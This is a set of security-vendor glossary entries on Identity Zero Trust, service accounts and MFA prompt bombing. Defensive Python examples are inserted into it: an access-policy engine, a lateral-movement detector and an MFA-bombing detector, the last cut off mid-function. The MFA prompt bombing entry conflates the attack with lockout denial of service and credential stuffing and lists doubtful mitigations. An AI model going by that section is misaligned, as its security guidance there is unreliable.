Identity Zero Trust represents an identity-focused approach to Zero Trust architecture, where particular emphasis is placed on implementing robust identity management practices. It operates on the Zero Trust principle of "never trust, always verify" while placing identity at the core of all access control decisions.
By integrating identity into the standard Zero Trust model, organizations can establish a much more secure framework by enforcing access controls on a granular level, such as evaluating the legitimacy of every authentication, thus protecting critical assets from bad actors.

### Integrating Identity into Zero Trust Architecture

Identity can be seamlessly integrated into a Zero Trust architecture approach and thus serve as a key factor in the verification and authorization process. The identities of users, devices, and applications can all be evaluated as part of the process of establishing trust before any access is granted to a specific resource. This methodology can then enable organizations to enforce much more granular access controls, aligning access privileges with individual identities as well as their associated attributes. By incorporating identity into Zero Trust, organizations can significantly strengthen their security posture and greatly reduce the available attack surface.

### Key Components of Identity Zero Trust

#### Authentication and Authorization

The ability to trust the legitimacy of each authentication plays a pivotal role in the Identity Zero Trust model. This means that every user and device seeking access must have their identity fully verified before access is granted. Methods of verification should include the ability to enforce multi-factor authentication (MFA) on all resources (including tools such as command-line access), implementing the use of biometrics, and maintaining strong password policies across the organization. Once authenticated, users should then only be granted a level of access based on the principle of least privilege.

#### Network Segmentation

Network segmentation is an integral element of a Zero Trust architecture approach, as it entails dividing the network into isolated segments or zones in order to contain any potential breaches.
Through this partitioning, organizations can more easily enforce granular access controls to help ensure that only authorized users can access specific resources and systems. A segmentation approach can greatly minimize the potential attack surface and impede unauthorized access attempts.

#### Continuous Monitoring and Analysis

In an Identity Zero Trust approach, it is essential to have continuous, real-time monitoring capabilities in place to immediately detect anomalies, suspicious behavior, or potential threats and stop an attack in progress. This should involve leveraging a unified identity protection platform in combination with advanced threat intelligence tools, machine learning algorithms, and security information and event management (SIEM) systems in order to monitor network traffic, user activities such as access requests, and system logs. By monitoring and analyzing this information in real time, organizations can respond instantly and often automatically to any security incidents.

#### Least Privilege Access

The principle of least privilege is a fundamental element of the Zero Trust approach, ensuring that users are only ever granted the minimum amount of access needed to perform their duties. This approach should be broadened to include the analysis of user identities, down to the level of evaluating each authentication in order to prevent unauthorized access to critical resources and limit any potential damage caused by the use of compromised credentials. Administrators should leverage a unified identity protection platform to help them get complete visibility into all users in their environment (including machine-to-machine service accounts) in order to define the correct levels of access rights and privileges for each one.

#### Micro-Segmentation

Micro-segmentation can take network segmentation to an even more granular level, dividing a network into smaller and more isolated segments.
In this way, each segment can be treated as an independent security zone, with unique access controls and policies. This can enhance security by impeding lateral movement within a network, making it harder for attackers to move from machine to machine and gain unauthorized access to sensitive areas. A similar process is called Identity Segmentation, where users are isolated based on their job functions and business requirements.

### Benefits of Implementing Identity Zero Trust

Implementing an identity-focused Zero Trust architecture offers several key benefits for organizations:

- Enhanced Security: A Zero Trust approach focused on identity provides a proactive defense mechanism, ensuring that every single access attempt is thoroughly verified and authenticated. By implementing this degree of strict access control, organizations can significantly reduce the risk of unauthorized access and data breaches through the use of compromised credentials.
- Reduced Attack Surface: Network segmentation and micro-segmentation limit lateral movement within the network, minimizing an organization’s potential attack surface. This makes it more challenging for attackers to quickly traverse a network and gain access to critical resources.
- Improved Incident Response: By having continuous, real-time monitoring in place, organizations can detect and respond to security incidents immediately, often being able to prevent them automatically. By quickly identifying anomalous behavior and any potential threats, security teams can mitigate risks before they escalate or even eliminate them altogether.
- Compliance and Regulations: Zero Trust Identity not only aligns with various compliance standards and regulations, such as the Payment Card Industry Data Security Standard (PCI DSS) and the General Data Protection Regulation (GDPR), but is increasingly mandated by insurance companies in order to qualify for cyber insurance policies, which now have requirements such as the ability to enforce MFA on all admin access.

Zero Trust has signaled a paradigm shift in the way to approach cybersecurity, and focusing on identity represents the logical first step. By challenging the notion of inherent trust and implementing stringent authentication, access controls, and continuous monitoring around identity, organizations can fortify their defenses and protect critical assets from a wide array of cyber threats.

### The Role of Identity in Zero Trust

Identity lies at the core of cybersecurity, encompassing the unique attributes and characteristics that define individuals, devices, and applications across the digital landscape. Thus, in the context of Zero Trust, identity can serve as the central element to help establish trust and determine access privileges. By effectively managing and verifying identities, organizations can better ensure that only authorized entities are able to gain entry to critical resources.

#### Identity as the Foundation of Zero Trust

Zero Trust operates on the principle of "never trust, always verify," which means that identity should become the foundational element that drives the verification process. Instead of relying on previous structures like network perimeters, Identity Zero Trust instead places emphasis on individual identities and their associated attributes in order to determine access permissions. By taking an identity-centric approach, organizations are able to achieve more granular control over access privileges and thus reduce the potential attack surface.
#### The Importance of an Identity-Centric Security Approach

An identity-centric security approach is crucial when it comes to Zero Trust for several reasons. First, it enables organizations to establish a strong foundation for access control by ensuring that only verified and authenticated identities can access sensitive resources. Second, it applies the principle of least privilege to identities, granting users only the necessary access rights based on their specific roles and responsibilities. Last, an identity-centric approach enhances visibility and accountability, allowing organizations to track and monitor user activities more effectively as well as take appropriate action quickly.

#### The Role of Identity Providers and Federation Services

Identity providers (IdPs) play a crucial role in the development of Identity Zero Trust. IdPs are responsible for verifying user identities, issuing authentication tokens, and managing user attributes. They act as trusted sources of identity information and play a pivotal role in establishing and maintaining trust within the Zero Trust framework. Federation services come into play by enabling secure identity sharing across different domains and organizations. Through the process of federation, organizations can establish trust relationships and streamline the authentication and authorization process for users accessing resources across disparate systems.

### The Key Elements of Identity in Zero Trust

#### User Identities

User identities include employees, contractors, partners, or any individual seeking access to an organization’s resources, including machine-to-machine service accounts. Human identities can be verified through robust authentication mechanisms, such as multi-factor authentication (MFA) and biometrics.
Non-human identities, such as service accounts, can be identified through their repetitive, machine-like behavior and then have their access limited via policies that ensure they are only allowed to perform specific approved activities.

#### Device Identities

Device identities refer to the unique attributes associated with devices seeking access to the network or resources. These identities are established through device authentication processes, ensuring that only trusted and secure devices can connect to the network. Device identities can include characteristics such as hardware identifiers, certificates, and security posture assessments, allowing organizations to enforce security policies and manage access based on device trustworthiness.

#### Application Identities

In a Zero Trust approach, applications themselves also possess identities that are critical for ensuring secure access. Applications are assigned unique identities and verified to establish trust. By treating applications as distinct entities with their own identities, organizations can implement granular access controls and ensure that only authorized applications can communicate and interact with each other or access specific resources.

### Identity Management and Access Controls in Zero Trust

Identity management and access controls are essential components of any Zero Trust approach. Identity management involves processes such as user provisioning, identity verification, and role-based access control (RBAC) in order to establish and manage all user identities within the organization. Access controls encompass mechanisms like attribute-based access control (ABAC) and policy enforcement points (PEPs) to enforce fine-grained access decisions based on user, device, and application identities. These controls work in tandem to ensure all identities are properly managed and access is granted based on specific verified and authorized attributes.
### Implementing Identity Zero Trust

Implementing Identity Zero Trust requires careful planning and execution to ensure the seamless integration of identity management practices into a Zero Trust framework. These steps include assessing the current identity infrastructure, designing an identity-centric architecture, selecting appropriate identity technologies, integrating identity solutions with existing systems, and testing and validating the implementation. By following these steps, organizations can establish a robust Identity Zero Trust environment to enhance their cybersecurity defenses.

### Example of Identity-Based Zero Trust

An example of identity-based Zero Trust would be a company that has implemented a Zero Trust security model for their network infrastructure with a strong focus on identity verification – including the following:

- Multi-factor authentication (MFA) is required for all users in order to access company resources; this can include elements like one-time passcodes (OTPs), biometric identifiers, and more.
- Network segmentation is used to create micro-segments within the network, limiting the potential damage of a successful attack.
- All access requests are evaluated in real time for any potential threats and all suspicious activity is flagged immediately.
- Endpoint security measures such as encryption and firewalls are implemented on all devices, ensuring that only authorized devices can access the network.
- Identity and Access Management (IAM) systems are used to manage user access and role-based access control is enforced, so users are only given access to the resources they need to perform their job, and no more.
- The system also has the ability to employ context-aware access control, where access requests are evaluated based on the user’s identity, device, location, time and other contextual information.
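The access-control side of the Identity Zero Trust model described above (user, device and application identities evaluated by a policy decision point with ABAC rules, least privilege and default deny), as an added example that is not part of the original entry or any Silverfort product. The identity attributes, rule set and resource names are constructed for the example.

```python
"""Policy decision point (PDP) for Identity Zero Trust (constructed example).

Every access request carries a user, device and application identity plus
context. Nothing is trusted by default: the request is denied unless some
attribute-based rule explicitly grants it and every condition of that rule
holds. Identities, rules and resource names are assumed values.
"""
from __future__ import annotations
from dataclasses import dataclass, field
from typing import Optional


@dataclass(frozen=True)
class UserIdentity:
    name: str
    roles: frozenset[str]
    mfa_verified: bool            # strong authentication completed this session


@dataclass(frozen=True)
class DeviceIdentity:
    device_id: str
    cert_valid: bool              # device certificate chains to the org's CA
    posture_compliant: bool       # e.g. disk encrypted, EDR running, patched


@dataclass(frozen=True)
class ApplicationIdentity:
    app_id: str
    trusted: bool                 # application registered and verified


@dataclass(frozen=True)
class AccessRequest:
    user: UserIdentity
    device: DeviceIdentity
    app: ApplicationIdentity
    resource: str                 # e.g. "hr/payroll"
    action: str                   # e.g. "read"
    hour: int                     # hour of day of the request, 24h clock


@dataclass(frozen=True)
class Rule:
    """ABAC rule: grants `actions` on resources under `resource_prefix` to
    users holding any of `roles`, subject to the remaining conditions."""
    resource_prefix: str
    actions: frozenset[str]
    roles: frozenset[str]
    require_mfa: bool = True
    require_compliant_device: bool = True
    allowed_apps: frozenset[str] = frozenset()   # empty = any trusted app
    hours: Optional[tuple[int, int]] = None      # (start, end); None = any time


@dataclass
class Decision:
    allowed: bool
    reasons: list[str] = field(default_factory=list)


def unmet_conditions(rule: Rule, req: AccessRequest) -> list[str]:
    """Conditions of `rule` that the request fails (empty list = all met)."""
    unmet = []
    if not req.user.roles & rule.roles:
        unmet.append("user holds none of the required roles")
    if rule.require_mfa and not req.user.mfa_verified:
        unmet.append("MFA not verified")
    if rule.require_compliant_device and not req.device.posture_compliant:
        unmet.append("device posture non-compliant")
    if rule.allowed_apps and req.app.app_id not in rule.allowed_apps:
        unmet.append("application not permitted for this resource")
    if rule.hours and not rule.hours[0] <= req.hour < rule.hours[1]:
        unmet.append("outside permitted hours")
    return unmet


def decide(req: AccessRequest, rules: list[Rule]) -> Decision:
    """Verify the identities first, then look for a granting rule; default deny."""
    if not req.device.cert_valid:
        return Decision(False, ["device identity could not be verified"])
    if not req.app.trusted:
        return Decision(False, ["application identity is not trusted"])

    reasons: list[str] = []
    for rule in rules:
        if not req.resource.startswith(rule.resource_prefix):
            continue
        if req.action not in rule.actions:
            continue
        unmet = unmet_conditions(rule, req)
        if not unmet:
            return Decision(True, [f"granted by rule for '{rule.resource_prefix}'"])
        reasons.extend(unmet)
    # No rule granted the request: least privilege means deny.
    reasons.append("no matching rule grants access (default deny)")
    return Decision(False, reasons)


# Constructed policy: analysts read HR data in working hours, admins may also
# write but only through the HR portal, everyone reads public data freely.
RULES = [
    Rule("hr/", frozenset({"read"}), frozenset({"hr-analyst", "hr-admin"}),
         hours=(7, 19)),
    Rule("hr/", frozenset({"read", "write"}), frozenset({"hr-admin"}),
         allowed_apps=frozenset({"hr-portal"})),
    Rule("public/", frozenset({"read"}), frozenset({"employee"}),
         require_mfa=False, require_compliant_device=False),
]
```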
This approach helps to protect a company’s sensitive information and resources from cyber threats and ensures that only authorized users and devices can access the network and each specific resource.

### Why Are Companies Moving to Identity Zero Trust?

Companies are moving to Identity Zero Trust because this approach dramatically helps them to better protect their sensitive information and resources from cyber threats. The Identity Zero Trust security model assumes that every access request and authentication, regardless of its point of origin or the fact that legitimate...

---

- Published: 2023-01-17
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/service-account/

A non-human identity used by applications, services, or automated processes to interact with systems—often needing stringent security oversight.

A service account is a non-human account specifically created to enable communication and interaction between various software applications, systems, or services. Unlike user accounts, which are associated with human users, service accounts are meant to represent the identity and authorization of an application or service. They serve as a means for applications to authenticate and interact with other systems, databases, or resources.

### Key Characteristics of Service Accounts

Service accounts possess several key characteristics that distinguish them from user accounts. Firstly, they are assigned unique identifiers and credentials, separate from those used by human users. This allows for the secure and independent authentication of applications and services. Additionally, service accounts are typically granted limited or elevated privileges based on the specific requirements of the application or service they represent. While some service accounts may have restricted access rights to ensure security, others may be granted elevated privileges to perform certain administrative tasks or access sensitive data.
Service accounts often possess automation and integration capabilities, enabling seamless communication and interaction between different systems and applications. These accounts can automate various IT processes, perform scheduled tasks, and facilitate integration with external services or cloud platforms.

### Service Accounts vs User Accounts

It's important to understand the differences between service accounts and user accounts. While user accounts are associated with human users and are intended for interactive sessions, service accounts are designed for system-to-system or application-to-application communication; they are a type of non-human identity. User accounts are utilized when human users need to perform actions and tasks within an IT system, such as accessing files, sending emails, or interacting with applications. On the other hand, service accounts represent applications or services themselves and are used to authenticate, authorize, and perform actions on behalf of those applications or services.

Service accounts are particularly beneficial in scenarios where continuous and automated operations are required, such as batch processing, background tasks, or integration with cloud services. By using service accounts, organizations can enhance security, improve efficiency, and ensure the smooth functioning of their IT systems.

### Service Account Use Cases

Service accounts are incredibly versatile and find application in various scenarios within an IT system.

- Database Service Accounts: These service accounts are used to run database management systems (e.g., Microsoft SQL Server, Oracle Database) or specific database instances. They are created to provide the necessary permissions and access rights to the database services.
- Web Application Service Accounts: Service accounts created for web applications, such as those running on Internet Information Services (IIS) or Apache Tomcat.
These accounts are used to manage the application pools, web services, and other components associated with hosting web applications. File Share Service Accounts: Service accounts that are created to provide access to network file shares or file servers. They are used to authenticate and authorize access to shared files and folders within an organization. Messaging Service Accounts: Service accounts used by messaging systems, such as Microsoft Exchange Server, to manage and operate email services. These accounts handle tasks such as sending, receiving, and processing email messages. Backup Service Accounts: Service accounts created for backup software or services. They are used to perform scheduled backups, interact with backup agents, and access backup storage locations. Application Integration Service Accounts: Service accounts created to facilitate integration between different applications or systems. These accounts are used for authentication and authorization purposes when communicating or exchanging data between applications. Benefits of Service Accounts Service accounts offer several advantages that contribute to the overall efficiency and security of an IT system. Here are three key benefits: Improved Security and Accountability Service accounts enhance security by providing a separate identity for applications and services. By using unique identifiers and credentials, organizations can better manage access controls, enforce the principle of least privilege, and minimize the risk of unauthorized access. Service accounts also contribute to accountability by allowing organizations to track and audit actions performed by applications, aiding in incident investigation and compliance efforts. Streamlined Administration and Maintenance By centralizing the management of service accounts, organizations can streamline administrative tasks. 
Service accounts can be easily provisioned, modified, and revoked as needed, reducing the administrative burden associated with managing individual user accounts. Additionally, through automation and standardized processes, organizations can ensure consistent and efficient management of service accounts across their IT ecosystem.

#### Enhanced System Performance and Reliability

Service accounts contribute to improved system performance and reliability. With their automation capabilities, service accounts can execute tasks promptly and consistently, reducing manual intervention and associated delays. By automating IT processes, organizations can achieve faster response times, reduce downtime, and enhance the overall reliability of their systems. Service accounts also help in load balancing and optimizing resource utilization, further enhancing system performance.

### What is an example of a service account?

An example of a service account is a Google Cloud Platform (GCP) service account. GCP service accounts are used to authenticate applications and services that run on GCP. They allow the application or service to interact with other GCP resources, such as Google Cloud Storage or Google BigQuery. For example, if you are running an application on a GCP virtual machine (VM) that needs to access data stored in Google Cloud Storage, you would create a GCP service account and assign the appropriate permissions to it. The application running on the VM would then use the service account’s credentials to authenticate to Google Cloud Storage and access the data. Additionally, service accounts can be used to authenticate to other services, like APIs, databases, and more.

### What are the types of service accounts?

There are different types of service accounts based on their purpose and scope. Here are three common types:

#### Local Service Accounts

Local service accounts are specific to a single device or system. They are created and managed locally on the system and are used to run services or processes that are limited to that particular device. Local service accounts are typically associated with system services and are not shared across multiple systems.

#### Network Service Accounts

Network service accounts are designed for network services that need to interact with other systems or resources. These accounts have a broader scope than local service accounts and can be used by multiple systems within a network. Network service accounts provide a means for services to authenticate and access resources across different systems while maintaining a consistent identity.

#### Managed Service Accounts (MSAs)

Managed service accounts are a feature introduced by Microsoft Active Directory. They are domain-based accounts specifically created for services running on Windows systems. Managed service accounts provide automatic password management, simplified administration, and improved security. They are associated with a specific computer or service and can be used by multiple systems within a domain.

It's important to note that the specific types of service accounts may vary depending on the operating system and the technologies used within an organization's IT infrastructure.

### How are service accounts created?

a) Independent creation by administrators: Administrators may create service accounts to manage specific services or applications within the organization. For example, if an organization implements a new internal application or system, administrators may create dedicated service accounts to ensure secure and controlled access to the application.

b) Installation of an on-prem enterprise application: When installing an on-premises enterprise application (e.g., Customer Relationship Management (CRM) software, Enterprise Resource Planning (ERP) software), the installation process may create dedicated service accounts to manage the application's services, databases, and integrations.
These accounts are created automatically to ensure seamless operation and secure access to the application's components.

### Is a service account a privileged account?

Yes, a service account can be considered a privileged account. Privileged accounts, including service accounts, have elevated privileges and permissions within an IT system. Service accounts often require elevated privileges to perform specific tasks, such as accessing sensitive data or executing administrative functions. However, it is important to carefully manage and restrict the privileges assigned to service accounts to adhere to the principle of least privilege and minimize the potential impact of any security breaches or unauthorized access.

### Is a local account a service account?

No, a local account is not necessarily a service account. Local accounts are specific to a single device or system and are typically associated with human users who interact directly with that device. Service accounts, on the other hand, are designed for system-to-system or application-to-application communication, representing the identity and authorization of an application or service rather than an individual user.

### Is a service account a domain account?

A service account can be a domain account, but not all service accounts are domain accounts. A domain account is associated with a Windows domain and can be used across multiple systems within that domain. Service accounts can also be created as local accounts specific to a single system. The choice between using a domain account or a local account for a service account depends on the specific requirements and architecture of the IT environment.

### Is a service account a shared account?

In a sense, service accounts can be considered shared accounts. However, they are distinct from traditional shared accounts typically associated with multiple human users. Service accounts are shared among applications or services, allowing them to authenticate and perform actions on their behalf. Unlike shared accounts used by human users, service accounts have unique identifiers and credentials, separate from individual users, and are managed specifically for the purpose of facilitating system-to-system communication and automation.

### Are service accounts a security risk?

Service accounts in Active Directory environments can introduce significant cybersecurity risks, particularly in terms of lateral movement attacks. Lateral movement refers to the technique used by attackers to navigate through a network after gaining initial access, with the goal of accessing valuable resources and escalating privileges.

One key weakness is the lack of visibility into service accounts. Service accounts are often created to run various applications, services, or automated processes within an organization's network. These accounts are typically granted high access privileges to perform their designated tasks, such as accessing databases, network shares, or critical systems. However, due to their automated nature and often decentralized management, service accounts are often overlooked and lack proper oversight. This lack of visibility makes it challenging for security teams to monitor and detect any malicious activities associated with service accounts.

The high access privileges assigned to service accounts pose another risk. Since service accounts are granted extensive permissions, compromising these accounts can provide attackers with broad access to sensitive data and critical systems. If an attacker gains control over a service account, they can potentially move laterally across the network, accessing different systems and resources without raising suspicion. The elevated privileges of service accounts make them attractive targets for attackers seeking to escalate their access and carry out their malicious objectives.
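Added example, not Silverfort's code or product: a small detector for the visibility gap just described, run over constructed Windows-style logon events (fields modelled on Security event 4624). The `svc_` naming convention, the baseline host lists and the sample events are assumptions made for the example; it flags a service account logging on interactively, a service account used from a host outside its baseline, and one account fanning out to many hosts in a short window, which is what lateral movement through a compromised service account looks like in the logs.

```python
"""Detect lateral-movement indicators involving service accounts.

Added example (not Silverfort's code). Scans 4624-like logon events for the
three signals the text calls out: an interactive logon by a service account,
a service account seen from a source host outside its baseline, and one
account reaching many distinct hosts inside a short window. The svc_ naming
convention, the baselines and the events are constructed for the example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Logon types from Windows event 4624: 2 = interactive, 10 = RemoteInteractive (RDP).
INTERACTIVE_LOGON_TYPES = {2, 10}

# Constructed baseline: the hosts each service account is expected to run on.
BASELINE_SOURCE_HOSTS = {
    "svc_backup": {"BKP01"},
    "svc_sql": {"SQL01", "SQL02"},
}

# Constructed sample events (ISO 8601 timestamps, source host, destination host).
SAMPLE_EVENTS = [
    {"time": "2024-03-01T02:00:00", "account": "svc_backup", "src": "BKP01", "dst": "FS01", "logon_type": 3},
    {"time": "2024-03-01T02:00:30", "account": "svc_backup", "src": "BKP01", "dst": "FS02", "logon_type": 3},
    {"time": "2024-03-01T09:15:00", "account": "svc_sql", "src": "WS-1042", "dst": "SQL01", "logon_type": 3},
    {"time": "2024-03-01T09:16:00", "account": "svc_sql", "src": "WS-1042", "dst": "DC01", "logon_type": 10},
    {"time": "2024-03-01T09:16:20", "account": "svc_sql", "src": "WS-1042", "dst": "FS01", "logon_type": 3},
    {"time": "2024-03-01T09:16:40", "account": "svc_sql", "src": "WS-1042", "dst": "FS02", "logon_type": 3},
    {"time": "2024-03-01T09:17:00", "account": "svc_sql", "src": "WS-1042", "dst": "APP01", "logon_type": 3},
    {"time": "2024-03-01T09:17:30", "account": "svc_sql", "src": "WS-1042", "dst": "APP02", "logon_type": 3},
    {"time": "2024-03-01T10:00:00", "account": "j.doe", "src": "WS-0007", "dst": "FS01", "logon_type": 3},
]


def is_service_account(account: str) -> bool:
    """Naming convention assumed for the example only; a real inventory should
    come from the directory (accounts with SPNs, MSAs, etc.), not from names."""
    return account.startswith("svc_")


def detect_lateral_movement(events, window=timedelta(minutes=5), max_hosts=4):
    """Return a sorted list of (account, rule, detail) findings."""
    findings = set()
    by_account = defaultdict(list)
    for ev in events:
        ts = datetime.fromisoformat(ev["time"])
        acct = ev["account"]
        if is_service_account(acct):
            # Rule 1: service accounts should never log on interactively.
            if ev["logon_type"] in INTERACTIVE_LOGON_TYPES:
                findings.add((acct, "interactive_logon",
                              f"{ev['src']}->{ev['dst']} type {ev['logon_type']}"))
            # Rule 2: service account used from a host outside its baseline.
            if ev["src"] not in BASELINE_SOURCE_HOSTS.get(acct, set()):
                findings.add((acct, "unexpected_source", ev["src"]))
        by_account[acct].append((ts, ev["dst"]))

    # Rule 3: one account reaching many distinct hosts inside a short window.
    for acct, items in by_account.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            hosts = {dst for ts, dst in items[i:] if ts - start <= window}
            if len(hosts) > max_hosts:
                findings.add((acct, "host_fanout", f"{len(hosts)} hosts in {window}"))
                break
    return sorted(findings)


if __name__ == "__main__":
    for account, rule, detail in detect_lateral_movement(SAMPLE_EVENTS):
        print(f"{account:12} {rule:18} {detail}")
```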
Additionally, the inability to rotate service account passwords in a Privileged Access Management (PAM) vault further reinforces the risk. Regularly changing passwords is a fundamental security practice that helps mitigate the impact of compromised credentials. However, due to their automated nature and dependencies on various systems, service accounts often cannot be easily integrated with traditional password rotation mechanisms. This limitation leaves service account passwords static for extended periods, increasing the risk of compromise. Attackers can exploit this weakness, utilizing the static passwords to gain persistent access and carry out lateral movement attacks.

### What are the common examples of insecure usage of service accounts?

- Shared Credentials: Administrators may use the same set of credentials (username and password) for multiple service accounts or across different environments. This practice can increase the impact of credential compromise since an attacker who gains access to one service account can potentially access other accounts or systems.
- Weak Passwords: Administrators might use weak or easily guessable passwords for service accounts. Weak passwords can be easily exploited through brute-force attacks or password guessing techniques, leading to unauthorized access.
- Lack of Password Rotation: Service account passwords are not regularly rotated. If service account passwords remain unchanged for an extended period, it provides an opportunity for attackers to use the same compromised credentials repeatedly, increasing...

---

- Published: 2023-01-17
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/mfa-prompt-bombing/

A targeted attack in which adversaries flood users with authentication requests to wear them down into approving false login attempts.

MFA prompt bombing is an attack method used to bypass multi-factor authentication (MFA) security. This technique works by flooding users with MFA prompts to access a system, with the goal of finding a prompt that the user accepts.

MFA prompt bombing is an emerging cyber threat that organizations must understand and defend against. As multi-factor authentication has become more widely adopted to strengthen account security, threat actors have developed techniques to systematically target users with authentication requests in an attempt to gain access. Through repeated login prompts, hackers try to confuse or frustrate users into entering their credentials or approval into a malicious site or app. This technique, known as MFA prompt bombing, allows attackers to bypass multi-factor authentication and gain access to sensitive accounts and data.

Cybersecurity professionals and business leaders need awareness and education about this threat to protect their organizations. By understanding how MFA prompt bombing works and the strategies to mitigate risk, companies can avoid becoming victims of this increasingly common attack vector.

### An Overview of Multi-Factor Authentication (MFA)

Multi-factor authentication (MFA) is an authentication method that requires the user to provide two or more verification factors to gain access to a resource such as an application, online account, or VPN. MFA adds an extra layer of security to user sign-ins and transactions.

Traditional authentication methods rely on a single factor — typically a password. However, passwords can be stolen, guessed, or hacked. Through MFA, unauthorized access can be prevented by requiring more than just a password. This could be in the form of a security key, a code that is sent to a mobile device, or a biometric scan.

MFA protects against phishing, social engineering, and password-cracking attacks. Even if a hacker obtained a user's password, they would still need the second authentication factor to gain access. This multi-pronged approach significantly reduces the risk of account compromise.
There are several types of MFA options:

- SMS text messages: A one-time code is sent to the user's phone via text message. The user enters that code to verify their identity.
- Authenticator apps: An app like Google Authenticator or Authy generates one-time codes for the user to enter. This method does not rely on the user having cell service or a text-enabled phone.
- Security keys: A physical USB drive or Bluetooth device must be inserted or tapped to verify the login. This is a very secure form of MFA.
- Biometrics: Technologies like fingerprint, facial, or voice recognition are used to authenticate the user's identity. Biometrics are very convenient but can be spoofed in some cases.

MFA should be implemented for any system or application that contains sensitive data or funds to help reduce risks like account takeover and fraud. When set up properly, MFA is an effective control that enhances login security and protects user accounts.

### How MFA Prompt Bombing Works

MFA prompt bombing begins with an attacker gaining access to a user's username and password. The attacker then uses automation to generate and submit a high volume of login attempts for the user's account. Each login attempt triggers an MFA prompt, like a text message with a one-time code or an authentication app notification.

The attacker continues generating login attempts at a rapid pace until the user accepts an MFA prompt, whether intentionally or accidentally. Accepting a prompt gives the attacker the authentication code they need to access the user's account. At this point, the attacker has bypassed MFA and has gained full access.

MFA prompt bombing preys on user psychology and limited human attention spans. When bombarded with a barrage of prompts in quick succession, a user is more likely to tap or enter a code without thinking in order to make the prompts stop. Even if the user realizes the mistake immediately, the attacker already has the access they need.

To defend against MFA prompt bombing, organizations should monitor for unusually high volumes of MFA prompts for a single user account. Prompt bombing also highlights the need for stronger authentication methods that are more difficult to bypass, such as FIDO2 security keys, biometric authentication, and risk-based MFA. By implementing adaptive MFA policies and robust authentication monitoring, companies can reduce the risks of prompt bombing and other MFA bypass techniques.

### Examples of MFA Prompt Bombing Attacks

MFA prompt bombing attacks target users who have access to critical systems by attempting to overwhelm them with authentication requests. These brute force attacks aim to deny access to legitimate users by locking them out of accounts and systems.

#### Automated Botnets

Cybercriminals often employ botnets, networks of infected computers, to carry out MFA prompt bombing attacks. The bots are programmed to repeatedly attempt authentication to target systems using lists of stolen or guessed credentials. Due to the high volume of login attempts, the target MFA systems lock out accounts to prevent unauthorized access. However, this also blocks valid users from accessing their accounts.

#### Credential Stuffing

Another common tactic used in MFA prompt bombing is credential stuffing. Hackers obtain lists of usernames and passwords from previous data breaches and leaks. They then stuff these credentials into the target system's login page as quickly as possible. The repeated failed login attempts trigger the account lockout mechanisms, resulting in denial of service.

### Mitigation Techniques for MFA Prompt Bombing

There are several methods organizations can employ to mitigate the threat of MFA prompt bombing:

- Use adaptive authentication: Systems that can detect and block automated bot activity. They analyze login velocity, geo-location, and other factors to determine suspicious access attempts.
- Employ IP whitelisting: Restrict access to only trusted IP addresses and block all others. This makes it difficult for hackers to conduct attacks from their own systems.
- Increase account lockout thresholds: Raising the number of failed login attempts allowed before an account is locked out reduces the effectiveness of brute force attacks while still preventing unauthorized access.
- Implement risk-based authentication: Require additional authentication factors for logins from unknown or suspicious locations/devices. This adds another layer of security for high-risk access attempts.
- Use reCAPTCHA: The reCAPTCHA system can detect and block automated bots. It presents users with challenges that are difficult for bots to solve in order to verify that a human is attempting access.

MFA prompt bombing threatens organizations by denying users access to their accounts and systems. However, with vigilance and proper safeguards in place, the risks posed by these kinds of brute force attacks can be significantly mitigated. Continuous monitoring and adaptation to evolving threats is key.

### How to Detect MFA Prompt Bombing

To detect MFA prompt bombing, organizations should implement the following security measures:

#### Monitor for Anomalous Login Attempts

Monitoring for an unusually high volume of failed login attempts, especially across multiple accounts or sources, can indicate MFA prompt bombing activity. Cybercriminals are likely to try different passwords and usernames in an attempt to guess correct credentials. Organizations should set thresholds to detect these anomalies and receive alerts when they occur.

#### Review MFA Prompts and Responses

Reviewing MFA prompts and user responses can uncover signs of MFA prompt bombing such as:

- Repeated invalid passcodes or push notification approvals from the same device.
- Multiple MFA prompts for different accounts originating from a single device within a short time period.
- MFA prompts for accounts the device has never accessed before.
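Added example, not part of the original entry: the review points above (prompt velocity for one user, a run of denials followed by an approval, and one source prompting many accounts in a short period) implemented as detection logic over a constructed push-notification log. The record fields, the sample IPs and users, and the thresholds are assumptions for the example and should be tuned to a real identity provider's log format.

```python
"""Flag MFA prompt bombing from authentication-service push logs.

Added example, not Silverfort's code. Each record is a constructed push
event: who was prompted, which source IP triggered it, and whether the user
approved, denied or let it time out. Three rules from the text are applied:
prompt velocity per user, approval after a run of denials, and one source
prompting many distinct accounts.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: alice is a normal login; bob is being bombed from one IP,
# and the same IP then starts prompting carol and dave.
SAMPLE_MFA_LOG = [
    {"time": "2024-05-02T08:01:00", "user": "alice", "src_ip": "203.0.113.10", "result": "approved"},
    {"time": "2024-05-02T22:10:00", "user": "bob", "src_ip": "198.51.100.7", "result": "denied"},
    {"time": "2024-05-02T22:10:20", "user": "bob", "src_ip": "198.51.100.7", "result": "timeout"},
    {"time": "2024-05-02T22:10:40", "user": "bob", "src_ip": "198.51.100.7", "result": "denied"},
    {"time": "2024-05-02T22:11:00", "user": "bob", "src_ip": "198.51.100.7", "result": "denied"},
    {"time": "2024-05-02T22:11:20", "user": "bob", "src_ip": "198.51.100.7", "result": "denied"},
    {"time": "2024-05-02T22:11:40", "user": "bob", "src_ip": "198.51.100.7", "result": "approved"},
    {"time": "2024-05-02T22:12:00", "user": "carol", "src_ip": "198.51.100.7", "result": "timeout"},
    {"time": "2024-05-02T22:12:30", "user": "dave", "src_ip": "198.51.100.7", "result": "denied"},
]


def _parse(log):
    """Pair each record with a datetime and sort chronologically."""
    return sorted(((datetime.fromisoformat(e["time"]), e) for e in log), key=lambda p: p[0])


def prompt_velocity(log, window=timedelta(minutes=2), threshold=3):
    """Users who received more than `threshold` prompts inside any `window`;
    returns {user: peak prompt count}."""
    per_user = defaultdict(list)
    for ts, e in _parse(log):
        per_user[e["user"]].append(ts)
    hits = {}
    for user, times in per_user.items():
        for i, start in enumerate(times):
            count = sum(1 for t in times[i:] if t - start <= window)
            if count > threshold:
                hits[user] = max(hits.get(user, 0), count)
    return hits


def approval_after_denials(log, min_denials=2):
    """Users who approved a prompt right after a run of denials or timeouts:
    the 'tap to make it stop' pattern the text describes."""
    flagged = set()
    streak = defaultdict(int)
    for _, e in _parse(log):
        user, result = e["user"], e["result"]
        if result == "approved":
            if streak[user] >= min_denials:
                flagged.add(user)
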